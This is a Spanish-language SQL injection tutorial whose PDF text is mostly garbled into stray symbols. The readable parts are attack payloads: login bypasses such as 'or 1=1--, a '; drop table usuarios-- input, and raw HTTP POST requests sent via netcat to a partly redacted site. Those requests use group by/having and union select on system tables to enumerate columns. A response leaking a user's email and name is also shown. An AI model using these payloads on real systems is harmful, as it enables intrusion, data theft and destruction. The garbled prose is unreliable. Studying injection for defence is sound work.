!

! "
#$%& ( '
) " * +"
,-
# . / "0#$%
' " , *
) 1 % )" + ! " , *
, ") - **
2 #$% ' "- " "
3 #$% 4

) 5
, ! )
%" "
5 " 67" ) " " " . "
* 8* " ! 6 . "
. 5 9 ", # #$% 4
:) *
* + ;7 " /
#. ; , "
8< + " " = "
" " ) "
>; ) - " .>
5 ", "
4 ' " ; "
4 # ! " 8< # ! "
4 ! ', *
? #$% 4 : "- " " , "
@ ' "
' " "A "
B * "+% "' "
C ; "
A " "' ) "
5. "

"" #

8 " )4 * " &

" 7 " " " ( D

# ) + = * 6 " " " " "

) & " + 6 9 & 6 &"
. " + " " .
! & 9 " " " " 6 ( "" "
. " & . " " 4 "" " "& "=
7 "+ " ( " 7< " ) " . (( # +
 2

; " " 6 " . " " .& 9 ") ) * 9

* " " 6 ) +" " ") "

5 . " & 7 " 6 (&

" " " . 4 #$%& " * " 9 " "
( " " " "

" $

!% & '
5 * " D C 2 . " " ) 4 ) " ) "
6 " . - ' & )4 6 " . 4
" * 9 " * " 9 ") " " "& 9
" 9 ( " ) 4 ( ) "
& " * ) " * . "
4 " "

% " + 4 " . 4
#8$ 8% ># 8 . " $ + % . . > * 6
* 6 7 " D C & #8$ 8% +
* & 6 " . "& #$% E# $ + % . . F

! " " * " " D " & 9 - ( "

) " " ,- 9 " . &
9 . 4 #$% " 6 + = " " "
E#+) " & : + " *
<F * 6 " "
51# CB@ + " #: * " CB

% . . = " 6" " #$%BC + #$%C & " " )

4 " " " "& + .= . " 6 " " 6 " "
"

+& " D " " >! #$%> " 9 4 "

9 " " . 4 ) ) " 6 "
& ( 4 " " . " 4 " "= 9
. & 6 " " #$%2
" ) " " . 4 " . 6 "& 9 " +
9 " " " " 6 6 " 6 . 4
"

( ) * # +,
$ ( " " " " " ) " " " 9 - + " *&
) 4 ) 4 " " 9 " = " " = ,:# ! 9
"& 9 " * " & " ) ) 4 9 " 6 "
2 G " E, . * & " 6 " " " "
"" F& " * ) " D= " " ) " ) :# & " " " )
" ) " . " 6 " !' " "
%51
 3

5 ) & "C & 9 " " " . ) " " "

( ) " & ) 9 . ) ) "
" 6" 9 7 9 " )
4 & " 9 " ) * " " -
" . = " 6 6 " # & E! 9 "
) " 6 " 2F " 9 " * ) 4 = " *
9 " ) :# 2

% " 9 " 7" " " & +

) " " ") " &" * * 9 - " . =
" :# "9 " *& ) = )
9 " ) " :# 2 G " 1;

8 " " & " * ( ) 9 " 6

"" 6 & 9 = " . "9 6
6 " .
' " & 6 " 9 " )= " #+) "
" - " , " 9 . :# +
" * G " 1;

, " * D CC = 6 " ) #0#$%& ) 4

) > " * #$% # 6 3 * G " 1;> H " & "
( = ( " " D CC2

, " " & 67" " " * #$%& " * "

6 "6 " " " . E#$% F& 9 ( " . " "
" " " &" + CC? "
#$% @ " & " 9 " " "9 6 "
#+) " G " 1;& + . #$%
CCB " * 0 " ) " .
. 6 " " "

5 ) . " & " * #$% " 6 " &

9 " " " " I) & "
9 " ) " * " ) .
" - " , " ( #$% # 6 & "6 ) "
9 " . " " & "
. " " "& " " " " 6 4 ""
" . " & 9 " " "
" " "& ) = " 4 6
" . . " " =" "

"- .# / ! 0

' 9 * & " " *&

* " 9 6 9 " " " * " +
9 "" "& " " " ) "
6 "& + " " #$% # 6 " < " .
 ?

# ) ") + " " #$% ) " &

4 & * " " ) " " ) " " . 9
)6 ) = " ) 4 . & "9
. " " & "9 & "
& " + ) " ) 4 " E' "
" J " " " " #0#$% # 6 & 9 "
6" " F

8 " " & " . " ") " " 9 "

6 ) " " " " " " " #0#$% 9
" . & 6 6 " 9 "
. " )4 6 & " 7 " #$% 4

%# )
; . "& ". " *
" " "" + " 6 "& 9 4
" " #0#$%& " "* " * & 4
" " "& 9 ) " . 6 "

8 " #0#$% " . " "

>#5> + . " = " & "" * "
" > > E- KKF

8 " 9 . " = & 9 6

" #5 " (. " "6 4 " EIF " #0#$% # 6 &
) " " ) " " "&" )7 "" 6
" < " 6 . "& " 4 & " "
< "

( 1 ( * $# + )
#0#$% " < " " "& ) = " 1 % )"
6 L"& " 4 " "
. " " < " " ) 4 "

5 " "6 " E#51& 5 ; M& !N #!N& ;'!& F + = "

" " ( 9 " 9 " " *
" " & " " " ;'! ! + 1 !

5 " + " 9 "

E8" F ( ) " " & " 6 #0#$%
# 6 & " " ;'! 332

5 ) " ) " I . " 9 .

" ) " + ) 4 "
6 "9 " " "

+* " " " " )9

" " ) " " " . & 9 " #0#$%
" & *
 @

8 * 6 " ) " " = " " D "

6 #$% E! 4 #5 "" > >F " " " "
7 " + #$% "9 6 " . "
& " 9 )7 "& " "
6 "& . ;:,:# " " " ) "
"6 )

+ ( & ,#))
; , 6 % * " >; ! * . " *
#$% # 6 > O#$% # 6 "* " " " , ") "
- ** " " " > 8" ". * 9 1: < " 6 "& "
9 " " * * " + " "
6

P & " " " " 6= " 9 " "

" ,! " #$% # 6 " & "
) . " " " " " "
< "& 9 +" ") < & " " "
" "6 ) "

# ) " " ""

* " ") " ) ** #$%&
9 " " ) > M . 8< " G " >&
" ) " ") ) ** " ) " "
" "" >" 6Q * EF>

5 " < = " > M . 8< " G "

> E #-1 B303B 022CB0@F " " 9 (
< )

< Q M9 < Q " "

< Q " " < Q" 6
< Q < < Q " + "
< Q" "9 " + < Q 6)
< Q"9 .

! -"""

" Q " Q " +

" Q " Q " +
" Q . +
"2 % & ,

; " ) & #$% " . 4 " " 5 "

" * " <" " " " " E!%0#$%
" : & ; " 0#$% " " *F "
6 "& < " . " " " "& . " "
" " & " * * " 6 (
" " " . "

% & +% + % ! .# . &
/ 51; ( . " "
8H:R8 ( 6 " "
,81S ( . "

% & ++ + + ) .# . &
' 85;8 ( 6 " ) "& " = "
, :! 8 ) " = "
( * " ) " . . "
5%;8
) * " "

% & + + #! .# . &
( " ." " ) " "9
#8%8';
" "* .
( . " " ) " "
1#8 ;
J
( * "6 " " "+
!,5;8
." " " * "
( ." " ) ) "
,8%8;8
"

%! # #!
% " " "" " * ( " * " "9
" "

%! # #!
( " * ) " 6
A :
" " ." "
( " * " "9 )
G 8 8
" ." "9 " 6 "
( " " ." "" "
/ : ! -S
. " " =* "
( < " 9 ) " "*
5H 1/
.
( " ." "" "
: ,8 -S
" *
 B

3 % &
T 9
U + 9
TU ,"
TV . 9
UV + . 9
V . 9
-8;G881 ( " * 6 6 "
% R8 (
1 ( " * ." " ) " "

4 & !

SELECT * FROM Tabla;

E8" " 6 6 " " " ." " ) >; ) >F

UPADTE Tabla SET password = 'Juajuajua' WHERE user =

'admin'
E8" " ( = "" " &
6 F

5 ) & " . 4 #$%& " * 9

4 " " "& " 9 " "* "
" " +

4 " #$% " & " "

" 4 " ! . * & = " "
* 4 " ) & " " ""
4 " " & 4

# ) " & " 6 " & " +

" " 9 6 " . "
& " " " 6 " 9 9
7 + #$% " ")

"5

#
# 67 " 9 . ( . * " 9 "& " .
" = " . " " >5 9 "
H ) " ' 8 >& " 9 * 6 & " "9
") & & " " " #$% ) "&
 C

" 6 " ) & )4 6 *

" " " = "

# ) " < 6 "" ) " "& "

6 " ) " . * & "
9 " " * " " 6" 6
9 " . "6 " " " <
+ . " ") " " " " 6 )

5 " * " 4 . 4 J . " &

! " # " & " * "
" 9 . " " " 7 " " " 8
" &+ )4 6 . .J
" " " & "
" ! " # &) 4 "". " "

0 8* " ! 6 . "
05 9 ", # #$% 4
0 :) *
0 8< + " " = "
0' " ; "

, " * & " 4 * 9 * + 9 .

) 4 " . " )4 6 " "
* " 6 "

( 6!
# ) 7 >#$% 4 > " ) J
) " " " * #0#$%& "9 . "
9 " & " & 9
" " 9 )
. < 7<

8" ". * 9 " " ) " " " " " " 6
( " . " "* "9 6 " " < " * "& "
9 &. " ". *
8" " 6 " " " =*
" "9 + "" "G " * # 6 "
4 " ) " " 5#! ) " " " #0
#$%& " " " G " 9 *
" 6 " )

+ 4! $ (! &
5 9 " =" " 9 " "
" 6 ) &* " ( " " "
+ .= " " " < 7< "
8 9 + = " " " ) ) " )9
( 6 & "9 ) 4 " "
" 9 "9 " " " "

8" " ) 9 + = " " "& " 6 "

6 ) " "& ) "
" 6" & " " 6 "
6 ) " " "" 6 " " 6 )& " 9
)7 " * " "" ) " "

; " " " * " )& " " : % &

" " " &" " " " 6 "& + " ) * "
* " " 6 ) . " " ) "
+ " D

:M& " ) 6 " * + =

" " " " 9 " " . ) "
" ) M. & " . < " "
"+ " " * " "

8 "& ) . ( ) " "

" ) .J " " " *
& 6 ( = " = " 6" . " ) " .
"

<FORM action=logon/logon.asp method=post>

<input type=hidden username=_UserName password=_Password>
</FORM>

8" * . . &) " " " " . " " . 5#!

9 " " 6 " & ) " " E!
+ J " " ( ) * ; %& 9
. 5#! " < ) " "& .
" " " . " " * ; % + 6 6
" " F 8 * 6 + ) ) & * &
" . " " + 6 . "=

select * from users where username = _UserName and

password = _Password

5 ) "9 " " " & ( " " " . &

* " 6 " " " . "II ) " " "= + &" .
" " 6 6 4 & " " &
 + ) ) " " ) "
< " % " * " "

http://www.objetivo.com/libreria.asp?edicion='Noviembre'

! " " & " % = ) " " "

" " 9 + " . "
" ) + ) " " " .= EN,F )7 " "
L1 6 ) L " " " 6 . 5#! 9
" 8 " " & + ) )
) 4 . . ) " " "
"* " " " . 9 * 6 " 6 . "

select * from numeros_anteriores where edicion =

'Noviembre'

" & " 9 ) " " "* " " ) "

#$% > 6 >& = " " 9 " . * 7 "
" . & + . " + " + 9 ) "
" " " " & " " " 9 +
#$%

5 6 " " " * " " 4 " ""

& " " ) " " + " ! & " " L
E' # F ( " " ")
" " ( ) 4 " ) +
.

% L E' # F " " * #$% # 6 *

"& "9 " 6 9
" 4 " * " 9 6
&" 9 " "" " )
9 + #$%

H " 4 9 = " " " " " .

) ( * . " + )
" " " & "

Usuario : An'gel
Password : 338xD

select * from users where username = 'An'gel' and

password = '338xD'
select * from numeros_anteriores where edicion =
'N'oviembre'

8 ) " " " 9 " 9 " "" "" " "

#$% # 6 & " 9 " & " 9
" . " . ( " " +
" . "

username = 'An'
edicion = 'N'

% . & ". 9 " . " * "

"& #$%& * " ( & 4 "
" " & " 9 9 9 "
" " " + & ". * #$% # 6

5 ) 9 " = " " . + * . "9

"" " L5 L + L1L II

8 " & . " "6" 9 9 " .J 6

6 67" ) " "+ " " * "
" 4 " * " %& " " " ) "&
" " ( 6 & ( .
"

8" " * 6 & " 6 9 " " " " "

" " " )4 6 + ) 4 " " " " )"
") " " . " . & " " " " "
" " 6 "& " * " 9 " .
) " "

8 * 6 & 9 " " " . " " &

" " 6 6 . & ) ) . " .J . 7<
+ . )

A ) = " )7 & " "" 6 " "

& 9 " "
E84 " " ? >8 # 6 >F "6 "
" )7 " ". & 9 + #$% " 6 ) " " 9 "&
9 " < 9 ) " " ) 4 + " (
7 " " " " ' " ' & " ) 4 > . #$%
# 6 " . #$% 4 > EH B * " + " "F
( ( 9 " " * .
6 ) " 9 ". " <
 2

1 $ %
&

' (#)*
+! , -. , / %
0 ,

, 123

% &
- & ) " 6 9 * & " " " &
" ) " " " ) ) "
* "" " ) " " + "& . "
" I " + = " " "& + "9 " .
& " ( .J ) " E! * >. . >F
) " "9 " ." > . " > )
" "" . "" >% " ' ">
)4 6 6

6 !8 ( 7 .
"6
" 7 " #$% 4 " & " * " 9
. " 9 " " "& 9 . " "
; %& 5#!& & " " " 6 ( 9 " < #$%
# 6 ' " 9 " ) "& "& .J "
6 ) & " & 4 & . " + ) 4 *
& 6 " "* " EH > % " ' ">F

# )
& " > 6 " > + = " " " = "
* "6 & " " . 9 " ) ) + = " " " " "
9 & 4 & " " . " . " " "
) "=

8 " " & . " "6 ) "

" 6 " # ) . " " " " ) "
* & 1: ) ) "& " " " " * " *
" " & "6 " 6 "
" " ) E8" " ) "& ) 6= " "&
" ) 6 "+ . F

9 ;:,5 * & 6 " "> "> " +J

9 " " " 6 ( " . 9 " )

! " " 6 " & . " =

&" ( . " 7 " " " 9 . * ) "
. " " 7 & "= )7 * 9 "
=
 3

$ (! 6) $ (! ) & 3(
! . " " & #
86 " : 0% & "
, " "+
" " "
* " .= & ! . "
" " .= "& : 0%
" " " D " 9
" 6" + ) " < "
"+* " " " "
- & 9 4 4 4
) " . "
"" " . *= 4 " " " " " "" "
" " " ) "& 9
" " "& " . "
" 6"
* .
5 " "
" " & )
) *
/ = "+ "
"& ) . " "
+ * "& " " ) 6 " "
"

! " " " . " . I) & "6"

" * " "& " E> L >F * +
" 6" * " ) 6 "

H 7 " " + .J " "

" " . " #$% = " " " * 9 "
" " . "" .

! " 9 " " " + = " "

* " ; % 5#!& ) * * " "
= " " 9 6 "9 " " " 6 "& . "
# 5 : + !5##G: , " " .
. 5#! 9 ) " + 6 #$% ; ) 7 = "
" 9 * " " 6 #$% " <""
. " " " 4 "

! 6 " 4 8" " * . < = " )

6 ) & . *=

---- Extracto -------------------------------------------

<FORM action=ingreso.asp method=post>
<TABLE cellSpacing=1 cellPadding=3 width=440
bgColor=#ffffff border=0>
<TBODY>
<TR bgColor=#ff0066>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
 ?

size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto -------------------------------------------

! " 9 * ( = & ; % " "& + "

4 . 5#! E! " " & . " " F
5 ) &" "9 ) 4 ( . " " & "
9 6 " " " " " "&
" " " 9 * #$% " 6 " " ) "
) . 9 + "6" "

select * from users where username = 'Angel' and password

= '338xD'

! " " 9 " " + "" 9 . ) <"

) " "9 ( " * 9 = 6
( 6

) " " ) * " "

) #$% 4 " I :M& 6 "
" * = " " + . "
" " + " D . " 'or 1=1—

Usuario : 'or 1=1--

! "" L V W

A 47 " "& 9 = " . ) +

.

select * from users where username = ' or 1=1-- and

password = ' or 1=1--
 @

1 9 " 9 " <" " " >: > 9 " &

"" " 6 6 " 6 E "6 " ) F&
. + = " " " " "" " . " "

1 ( ,
0 4

Usuario : 'OR''='
Password : 'OR''='

5
4/

' ) & " " 6 + 6 4 .

" > " ">& " " " > 00 > E, ) / F "
#$% ( & " "
"& #$% 9 . 9 6 .
. +

# ) " " 7 " . " 6 " 9 . "

< + " & " & " 6"
& " ) "& " . "
" & ( " 6 .

#. 4 & " " " " " " 9 <"

"" )4 6 & .J " * >5 > > > " =
+ . "

Usuario : Admin'--
Password : 'or 1=1--

8 = & " 9 " " = " " " .

select * from users where username = 'Admin'-- and

password = ' or 1=1--

# " * "= + " . 4 & ) ) + "

.

8 " & "6" ) 6 " " ">L>

E' " F " " + > 00 > E, ) / F
6 9 " + " < "& " ) "
 " " > " . "> 6 " ) "& 9 "
" " ".

) 4) # $ 7! . ! #
5 " " " " "* " <
#$% + . & " 6 " ) 9 6
6 . " " ) " * " " " " .9
" "

' + = " 9 " " & . + & = "

* & ) 4 " > < > 9 " " . + *.
" + " " "" " "
! " 9 . E' + < " F& " " "
"& " " " " " . & . 9
9 " J " " ) " " "& + " 9 "
6 " " " & 4 & " 6
* " " " " " 6 " " "
" ) 4 & " 6 " 4 & " + *
" " " ) " < 6 . &
. " 9 " " " . "
"" 6

5 " * " " ) " * " " "& "

6 6 . " " ( " " "
9 D ) "9 " + *
" " * "

17 ! $ 7! . % #
' ; #$% # 6 & + " 6
"" 6 & " 6 . " " 6
##$%#8 H8 & " >
" < >< Q "
) & " ) +> > " " "
" ) " " #$% # 6

) " ) " ) " " *

) ) "& 6 " )4 "& +
)Q
. ) " " *

) " " )4 " ) " "

" . " 8 4
" " " " ". * .J
" 1 8 " " "& "
". * " " " " ) "+
6" "
 B

. 6 9# + &
% " 9 " , . # 6 & . &" " " D " &
" 6" " " " " E' = " 5 F
" " E8 " " * 9 " 9 " .
) " = "& 4 " " 6
" ( + ( & F

5 * " " " " "9 "6" " &

9 6 " & " .J ) . 6 9 J *
9 " & . 4 & " " " " 9
= . " " 6

8 6 " " & M " " *

" &6 ) + #$%& = 4 & &
9 4 " " "

Usuario : '; drop table usuarios--

Password :

# * &" " 6 . "

* EH " >8* " ! 6 . " >F &
) ) ) > " "> " & 9 "
& .J " * " * "

' & + " " " & 6 "

6 ) ( " " & 6 5"= + &
" 9 , # " " " "9 " .
7 " " ) "& 9 ) " ( & ) = "
+

1 $ % %

+ 67 & 4/
) . $

: 3( ) & ! #&
! ) ) " * " " " " (
7 " #$% 4 & " " ") " 9 )
" " :,-' :%8 ,- 4 " #$% # 6 .
( D "

# ) " " 9 & " .

" & " " . 7< &
" " "E "9 ) " " ( = &
. ) "6 "& . " ) " 9
& + " " ) " " " * F
 C

"9 " " "6 ) " + *

1 8 .1)

8 & "9 6 (" 6 " & 6 "

" " 6") " " "9 "
6 ) " "& . "

+* &" " * 9 " <

" " 4 " " &+ " " " 6 " "
" " + " 6 ( "

! " " ". 4 & " " " )

" > L > E' # F "
" D * " " .

Warning: SQL error: [Microsoft][ODBC SQL Server

Driver][SQL Server]Unclosed quotation mark before the
character string '\')'., SQL state 37000 in SQLExecDirect
in php/db_odbc.inc on line 61 Database error: Invalid
SQL: Select * from usuario where (usuario.login='\'')
ODBC Error: 1 (General Error (The ODBC interface cannot
return detailed error messages).) Session halted.

- & 6 "9 * " < " :,-'

:)6 "" * #$%"

% < ) " " " . "
E > )Q ) >F
2 ! " * )Q ) & " 9 "
3 8 ) ) " " ( "> " >
? " " " "> . >

- & " 9 6 + " 6" . * 9 +

. " " :,-' 8 )Q )

1 3
%
)
010.8#* - "3.9$

(")-#) :;<<

123
----- Fragmento -----------------------------------------
<?php
/*
* Session Management for PHP3
*
* Copyright (c) 1998-2000 XXXXXXXXXXXXXXX
([email protected])
* Modified by XXXXXXXXXXXXXXXXXXXX
([email protected])
*
* $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $
*/
class DB_Sql {
var $Host = "";
var $Database = "";
var $User = "";
var $Password = "";
var $UseODBCCursor = 0;
var $Link_ID = 0;
var $Query_ID = 0;
var $Record = array();
var $Row = 0;
var $Errno = 0;
var $Error = "";
----- Fragmento -----------------------------------------

- " " " " >" " > 6 " "

6 " " 6 ) " X " + X! "" " "
. &" 9 " ( " " " . " "6 " " " "
* & . " 6 4 * . 9 "
* & " "& 9 * 9 9 6 " #$%&
A " + 6 & " " . " 6 "
" " . " " < 9 " 6 "
* " " " ) E8 " " = ) "
)Q ) F

: ) & * / !
:M& 6 " " 9 + #$% + "
* 6 " ) " " ) "
"& * .
+ " " " ) 9 4 * "
+ . & " 9 4 " " ) " 6 +
.
8 " " 6 " " " " ( &
" ( 7 " #$% 4 & "
"

! " 9 "6 " " " * & . "

6 4 6 " " & " " 9 "
" ) "& J " " ( 9 " "
" ) " " ) < 9 6 7 " ;;! " 6
"

# " +) " "' % E8 M

" " B * "+% "' "F&
9 " " " ) 4 E5 . 6 &
" . F ". . = "

- " 9 " 6 " " " " 6 " * "

7 " ;;! " )4 6 & " < " "& (
9 D " 6 " < & "" " 6
< & ". *

nc -vv www.objetivo.com 80 < sentencias.txt

' "
' + " * " " ;;! *
& ( " ** * E8 " " * # +1 & "
8 9 F& . . " ) )4 6 . "
) " + " D " * " E5 . ) " " " F& " 6
" "

8" * "

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Angel&txtPassword=Angel
Y Y
Y H . " >! "" >
 Y * . "
Y
H . " > " >
* . "

- & " . 9 "" * !:#; )

" " ** 6 < 9 4 <& " "
) " " " .

! " 9 " " . + " ) 9 " "

" " ) " + ) > L > E' " F
* & 6 6 " & )
( " ) " * ) ( 6
* ! " " 6 " " " " " " #$% 9
" " E 6 .& . )+& F

8 )46 "" ( > > " " ' " "

" " > "> #$%& " * " 6 " * " 9
6 9 #$% E 4 6 < & " 4
:%8 ,-F ) " " " " )" 6 "& " 4 " * 6 "
" 6 " "

H 6 " " " 4 < 6 " " " * "

( " 7 !:#; 9 " ( " 6= (
" ) 4 6

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 46
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27having+1%3D1--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
 2

1 .
$ " =
3 )*1(
5*'>

! ) 6" "". " " " 6 !:#;& " 9 "

" " ) " > "> " "" " ;;!
% ) " " ( * " "
9 6 " 6 "

! + 4
\ ' # Z
] ! +' Z2-
, "! " Z25
OO 8" [ Z
V #. . Z2,
& ' Z '
E ! 7 "" Z B
F ! 7 "" Z C
U + Z28
T Z2'
5 )
!
[ " Z -
0 " 0
^ - M# " Z?'
Q " Q

:MK 9 " ( " 4 <& " " " " (

" 6= & +6 9 " ! " 6 "
6 = 9 " 6= " "
" 9 " 6" 9 " &+ 6 "9 "
" " " " )

8 "

nc -vv www.objetivo.com 80 < Injection.txt > result.html

- 6 "9 " 9 . " " + > 6 .>&

) " 6" * " 9 4 " "

! " " " & . " & " 7

* " 9 " " * " )
" "" " + "

H " 9 4 " "

 3

Microsoft OLE DB Provider for ODBC Drivers error

'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UserID' is invalid in the select
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85

! * KK " " " & " )" 6 9

" 4 " & 6 :,-' #$% # 6 " 6 6 )
) ) " " ( * " " . .
E # 5 :#F& "= )7 " E " ,F

5 9 " ) ) & " * " = &

" 6 6 " " * 4 < + ( " " * "
" "& " " " ) # 5 :#
H " 9 = " * " 6 !:#;

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 71
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx
=COUNTRYNAME=Argentina
txtUsuario=%27group+by+usuarios.UserID+having+1%3D1--
&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. "
H + L. )+ " " " , 6 . V 00

% . 4 6 " = &6 " ".

"

Microsoft OLE DB Provider for ODBC Drivers error

'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UID' is invalid in the select
 ?

list because it is not contained in an aggregate function

and there is no GROUP BY clause.
/Login.asp, line 85

6 ( " " " &

" 9 " " > 6 .>
" 6 ( " >. )+> " )
+ " , ) # 5 :#& " " ,

#. " .= & " " " " "+

" " 9 ) # 5 :# ( "
> . " > * " " "& "
> 6 > " ) " + 8" " =

'group by usuarios.UserID,usuarios.UID having 1=1--

#! ! *

Microsoft OLE DB Provider for ODBC Drivers error

'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Nombre' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85

'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1—

#! ! *

Microsoft OLE DB Provider for ODBC Drivers error

'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Email' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
 @

'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1--

#! ! *

HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date:

Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved
Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23
GMT Connection: close Location: PaginaPersonal.asp
Content-Length: 139 Content-Type: text/html Set-Cookie:
xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US
ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun,
16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private

Object Moved
This object may be found here.

:M 9 =&
" )" 6 " + )
". > " "8 > 8 9
" " 9 & ) " . * ) " . "
> > " ( " #8%8'; . E/ "1
F A=4 " 9 " " !:#; ;;! 1: " &" 9
" " " 6 . " " " "
) " "& 4 6 9 #$% 6
+

E8" " L. )+ " " " ,& " " ,& " "1 ) & " "8
6 . V 00F

, " & " " 9 & * "

* " " " " ) &
( " " " . "

' & . " " " "" . " 9 ;:,:# " "
) " " #8%8'; . & " "&
9 + 9 " " " " #8%8'; " + 9 *
" " II 6 " 4 < " #
9 " * " " .

SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x

AND campo5=y
 ( 7 E8" " >. )+> + > 6 .>F "
) = " " ) " > >& > > + > 2>&
" ) = " <" > ?> E, * " " 9 "
. * >#8%8'; _ A : ` a> " ="&" * )
"+ " " " 7 F " " " " " "
) ( . " "

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 297
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy
sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3
D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro
m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na
me%3D%27usuarios%27+order+by+1+desc%29+order+by+1--
&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
Y
H + "L " ) & & & * "+" )4 " & "+" "
) V) VL " "L ) E" )
* "+" )4 " & "+" ") V) VL " "L
)+ " F )+ 00

- 9 " "
" III H "& ( " +
> "> = 9 ) "" " # * " (
" " . & " "
+ % . " 1 :1 " . + 9
" " " & " " " " ) " ""
#S#:-b8';# + #S#':% 1# " > ,> * 9
" ) " 6 (
" ;:! E8 " " F % " " " (
1 6 9 " " 6 " #8%8';
7 " "& "= * 9 ) 6 " "
 B

4 ;:!& " 9 . " "

;:,:# " " ) )4 6 "
!:#; 6 ;:! F

% " 9 = " ) " " " . " "

" &

Ups' union select b.name,1,1,1 from sysobjects a,

syscolumns b where a.id=b.id and a.name='usuarios' and
b.colorder = 48 --

7 " & 4 " 4 " +J . "

" " E! 4 9 " " " " ") (
" > >F

! 6 " " " 7 " 4

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07' [Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the nvarchar value
'UserSubPLUSDate' to a column of data type int.
/Login.asp, line 85

:M& 6 " :,-' " " 9 )

) # 5 :# " > " # )!% #, > % . " &
6 ". ;:! + " . " " " "
) "+ "

:- .# ! #& +

5 ) & &+ " 6 ( 9 " "

". 6 " & ) " " ) " ) + "
"& " 9 )7 " " 6. " 9
" " % . " & " " " #$% > 1 :1>&
D * ># EF> "

# ) " 1 :1 " " " " >) " "> 9 " *

. 4 #$%& " 9 " J " * "& " ) "
J 6 " ) " " ! 4 & " " J
1 :1& " " " > >& )
" " " " " ) " "

! " * # EF& " ) " 7 " .

" "
 C

5 9 " " . ) " " 6 " "

( "4 "& & " +

; " " 6 " 4 < + 7 " * 9

. ". "

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
